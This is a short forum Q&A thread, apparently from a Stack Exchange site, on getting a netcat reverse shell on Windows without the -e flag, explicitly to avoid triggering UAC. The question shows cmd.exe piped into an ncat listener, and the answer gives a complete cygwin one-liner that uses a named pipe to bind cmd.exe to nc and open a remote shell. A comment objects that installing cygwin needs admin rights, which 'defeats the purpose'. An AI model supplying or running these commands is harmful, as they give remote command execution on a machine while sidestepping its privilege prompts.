Reverse shell using netcat on windows (no -e option)

1

Is there any way to get a reverse shell in Windows using netcat without using -e option since it triggers UAC?

I made it work from Linux to Linux by using a named pipe. I wanted to achieve something similar in Windows.

Running c:\windows\system32\cmd.exe | ncat -l -p 666 on Windows gives me a prompt in Linux when I connect:

# nc 192.168.0.109 666
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\user> dir

^C

It looks like I'm close, maybe something simple is missing? If only there were named pipes in Windows...

Adriano_epifas

Posted 2017-12-12T05:18:00.970

Reputation: 140

Answers

1

I'm not sure if you can do it with pure win32 netcat but you can do it in cygwin. Listen on 1234 like nc -l 1234 then connect to that in a separate window with this command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/cygdrive/c/windows/system32/cmd.exe 2>&1|nc 127.0.0.1 1234 >/tmp/f

Note the up and down keys do not work to cycle through the command history using this method.

Jay

Posted 2017-12-12T05:18:00.970

Reputation: 21

Thank for posting this Jay. But I believe you need Admin priv to install cygwin and that defeats the purpose of it. – Adriano_epifas – 2017-12-12T17:31:00.790

Asked: 2017-12-12T05:18:00.970

Viewed: 1 358 times

Active: 2017-12-12T07:51:02.000